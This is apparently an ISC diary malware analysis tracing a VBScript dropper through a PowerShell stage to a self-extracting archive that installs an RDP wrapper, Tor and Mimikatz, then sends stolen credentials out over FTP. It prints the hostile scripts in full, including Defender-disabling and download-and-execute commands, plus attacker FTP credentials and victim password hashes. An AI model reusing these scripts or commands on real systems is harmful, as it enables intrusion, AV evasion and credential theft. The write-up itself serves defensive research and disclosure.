Let’s review a malware sample that I spotted a few days ago. I found it interesting because it's not using deep techniques to infect its victims. The initial sample is a malicious VBScript. For a few weeks, I started to hunt for more Powershell based on encoded directives. The following regular expression matched on the file: // New-Object $enc09 = /(TmV\x33LU\x39iamVjd[A-P]|[\x2b\x2f-\x39A-Za-z][\x2b\x2f-\x39A-Za-z][\x31\x35\x39BFJNRVZdhlptx]OZXctT\x32JqZWN\x30[\x2b\x2f-\x39A-Za-z]|[\x2b\x2f-\x39A-Za-z][\x30EUk]\x35ldy\x31PYmplY\x33[Q-T])/ The initial script (SHA256:bf06b682c637d470b15e3c7b76e6d25356719286cfcc75a12bf3c31be859d2b5) is, still today, detected by only one AV engine[1]. Here is a beautified version of the script: sDir = "C:\ProgramData\ID.dat" Set oFSO = CreateObject("Scripting.FileSystemObject") If oFSO.FileExists(sDir) Then Set objFSO = CreateObject("Scripting.FileSystemObject") objFSO.DeleteFile WScript.ScriptFullName WScript.Quit() Else wscript.sleep(333000) Dim ShaDev set hfhejotgbhzlzyohafchtul = createobject("wscript.shell") ShaDev = hfhejotgbhzlzyohafchtul.ExpandEnvironmentStrings("%ProgramData%") Set shadow=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") shadow.dataType="bin.base64" shadow.text="... [Base64 chunk of dat] ..." Set sexy=CreateObject("ADODB.Stream") sexy.Type=1 sexy.Open sexy.Write shadow.nodeTypedValue sexy.SaveToFile ShaDev & "\WindowsProtect.vbs",2 wscript.sleep(4000) Sub KillAll(ProcessName) Dim objWMIService, colProcess Dim strComputer, strList, p strComputer = "." Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process Where Name like '" & ProcessName & "'") For Each p in colProcess p.Terminate Next End Sub KillAll "cmd.exe" Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Do Running = False Set colItems = objWMIService.ExecQuery("Select * from Win32_Process") For Each objItem in colItems If objItem.Name = "cmd.exe" Then Running = True Exit For End If Next If Not Running Then Set objShell = CreateObject("Shell.Application") objShell.ShellExecute "cmd", "/k ""C:\ProgramData\WindowsProtect.vbs", "", "runas", 0 End If Loop While Not Running WScript.Sleep 4000 KillAll "cmd.exe" Dim fso, MyFile Set fso = CreateObject("Scripting.FileSystemObject") Set MyFile = fso.CreateTextFile("C:\ProgramData\ID.dat", True) MyFile.WriteLine(" ") MyFile.Close Set objFSO = CreateObject("Scripting.FileSystemObject") objFSO.DeleteFile WScript.ScriptFullName WScript.Quit() End If Not obfuscated, it is easy to understand its behaviour: First, it checks the presence of itself (if the victim has already been infected) by checking the existence of an ‘ID.dat’ file. If it exists, it removes the file and exits. Otherwise, another second-stage VBScript is decoded, dumped on disks and executed (‘WindowsProtect.vbs’). Let’s have a look at the second stage. The decoded Base64 data (SHA256:6a25a0dbc0627e36e307e87e677e307d08982720c3dbeffe9986c3c770c37fa8) is unknown on VT. Here is the script: Dim x Dim y Dim z x = " Set-MpPreference -DisableIOAVProtection $true" y = " Add-MpPreference -ExclusionPath 'C:\'" z = " -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('hxxp://92[.]53[.]91[.]141/MP3/T0R.mp3','C:\ProgramData\Isass.exe');Start-Process 'C:\ProgramData\Isass.exe'" Dim objShell Set objShell = WScript.CreateObject("WScript.Shell") command = ("powershell" & x ) commany = ("powershell" & y ) commanz = ("powershell" & z ) objShell.Run command,0 wscript.sleep(4000) objShell.Run commany,0 wscript.sleep(11000) objShell.Run commanz,0 Set objShell = Nothing wscript.sleep(4000) Set objFSO = CreateObject("Scripting.FileSystemObject") objFSO.DeleteFile WScript.ScriptFullName WScript.Quit The next stage is, of course, the malicious PE file (SHA256:b5cc67c06f1352039209557aa8e62e1eabefaa4646fe449326bf50f62382eacd) and is also unknown on VT. It’s a classic PE file: root@remnux:~# exiftool Isass.exe ExifTool Version Number : 9.46 File Name : Isass.exe Directory : /tmp File Size : 4.6 MB File Modification Date/Time : 2019:08:22 14:44:24-04:00 File Access Date/Time : 2019:08:22 14:44:23-04:00 File Inode Change Date/Time : 2019:08:22 14:44:24-04:00 File Permissions : rw-r--r-- File Type : Win32 EXE MIME Type : application/octet-strea Machine Type : Intel 386 or later, and compatibles Time Stamp : 2017:08:11 09:54:06-04:00 PE Type : PE32 Linker Version : 14.0 Code Size : 188928 Initialized Data Size : 69632 Uninitialized Data Size : 0 Entry Point : 0x1cec9 OS Version : 5.1 Image Version : 0.0 Subsystem Version : 5.1 Subsystem : Windows GUI The PDB path ('D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb') discloses that the PE file is a self-extracting archive. Program Data Base files are used to keep debugging info about a program when it is compiled. The PDB stores many interesting data like symbols, addresses, names of resources etc. SFX files can execute a script once the content is unpacked. Easy to detect in the PE strings: root@remnux:~# strings Isass.exe | grep Setup= Setup=%SystemDrive%\Intel\Logs\h32.exe %SystemDrive%\Intel\Logs\beforeinstall.bat Here is an extract of the script: @echo off set CURRENTPATH=%SystemDrive%\Intel\Logs set INSTALLPATH=%SystemDrive%\ProgramData\Microsoft\Windows\Updates mkdir %INSTALLPATH% del /F /Q %INSTALLPATH%\install.bat move /Y %CURRENTPATH%\Tor %INSTALLPATH% move /Y %CURRENTPATH%\Data %INSTALLPATH% move /Y %CURRENTPATH%\Service %INSTALLPATH% move /Y %CURRENTPATH%\h64.exe %INSTALLPATH%\h64.exe move /Y %CURRENTPATH%\h32.exe %INSTALLPATH%\h32.exe move /Y %CURRENTPATH%\zip.exe %INSTALLPATH%\zip.exe move /Y %CURRENTPATH%\ncftpput.exe %INSTALLPATH%\ncftpput.exe move /Y %CURRENTPATH%\ftps.cfg %INSTALLPATH%\ftps.cfg move /Y %CURRENTPATH%\install.bat %INSTALLPATH%\install.bat move /Y %CURRENTPATH%\mimitask.bat %INSTALLPATH%\mimitask.bat reg Query "HKLM\Hardware\Description\System\CentralProcessor\0" | find /i "x86" > NUL && set OS=32BIT || set OS=64BIT if %OS%==32BIT set hidexe=h32.exe if %OS%==64BIT set hidexe=h64.exe cd %INSTALLPATH% %hidexe% install.bat >> %INSTALLPATH%\Service\install.log 2>>&1 cd %CURRENTPATH% rmdir /S /Q %CURRENTPATH%\Tor rmdir /S /Q %CURRENTPATH%\Data rmdir /S /Q %CURRENTPATH%\Tor DEL /Q /F %CURRENTPATH%\Data DEL /Q /F %CURRENTPATH%\Service DEL /Q /F %CURRENTPATH%\h64.exe DEL /Q /F %CURRENTPATH%\h32.exe DEL /Q /F %CURRENTPATH%\zip.exe DEL /Q /F %CURRENTPATH%\ncftpput.exe DEL /Q /F %CURRENTPATH%\ftps.cfg DEL /Q /F %CURRENTPATH%\install.bat DEL /Q /F %CURRENTPATH%\mimitask.bat rmdir /S /Q %CURRENTPATH% DEL /Q /F "%~f0" > NUL You can see that many files are dropped on the infected computer. The more interesting ones are:
The ‘install.bat’ script is also very interesting (SHA256:550e8e6fcfc4db2139dfa2e6e4f26e881b405e21b752a750d4cc682da0361567) and also unknow on VT. Too big to be posted here, here is an overview of its features:
The RDP wrapper is fetched from another site: hxxp://yourdatafor[.]me:94/azaza/: Collected data are exfiltrated via FTP (FTP is still alive!) via the ncftpput.exe tool. The configuration is present in the archive in the ftps.cfg file: root@remnux:~# cat ftps.cfg host etomakra.me user ftpuser pass Super123123 Yes, even attackers use weak passwords! The server is not protected and allows to download all files collected from victims. The domain 'etomakra.me' has been registered on July 16th 2019. I synchronized them during a few days (now the FTP server is down). For each victim, two files were uploaded: The first one contains the malware installation logs: root@remnux:~# unzip -t PLAYBOX1_RDP.zip Archive: PLAYBOX1_RDP.zip testing: Program Files/RDP Wrapper/hostname.log OK testing: Program Files/RDP Wrapper/installer.log OK testing: Program Files/RDP Wrapper/tor_install.log O No errors detected in compressed data of PLAYBOX1_RDP.zip. The second one contains the output of Mimikatz: root@remnux:~# unzip -t DESKTOP-UII5HVF_82742.zip Archive: DESKTOP-UII5HVF_82742.zip testing: ProgramData/Microsoft/NetFramework/Test/credoz.txt OK No errors detected in compressed data of DESKTOP-UII5HVF_82742.zip. Each archive contains the same file 'credoz.txt': root@remnux:~# head -30 credoz.txt Hostname: [redacted] / authority\system-authority\system .#####. mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz(powershell) # sekurlsa::logonpasswords Authentication Id : 0 ; 2254335948 (00000000:865e6fcc) Session : RemoteInteractive from 2 User Name : Admlnlstrator Domain : [redacted] Logon Server : [redacted] Logon Time : 2019/08/17 19:33:43 SID : S-1-5-21-2984074050-2788484596-579673664-1006 msv : [00000003] Primary * Username : Admlnlstrator * Domain : [redacted] * NTLM : eddcae2f04515b3a77e37ff4f5d2878d * SHA1 : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698 [00010000] CredentialKeys * NTLM : eddcae2f04515b3a77e37ff4f5d2878d * SHA1 : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698 tspkg : wdigest : * Username : Admlnlstrator You can see that the rogue administrator account has been used. In one week, I collected 188 credential files from the FTP server! Based on the re-upload of new files at every reboot, the number of unique victims is 53: root@remnux:~# ls -1 creds/*.zip|awk -F "_" '{ print $1 }'|sort -u|wc -l 53 Did you see the same kind of activity? Do you have more information about this malware? Feel free to share! [1] https://www.virustotal.com/gui/file/bf06b682c637d470b15e3c7b76e6d25356719286cfcc75a12bf3c31be859d2b5/detection Xavier Mertens (@xme) |
Xme 579 Posts ISC Handler Aug 23rd 2019 |
Thread locked Subscribe |
Aug 23rd 2019 1 year ago |
Sign Up for Free or Log In to start participating in the conversation!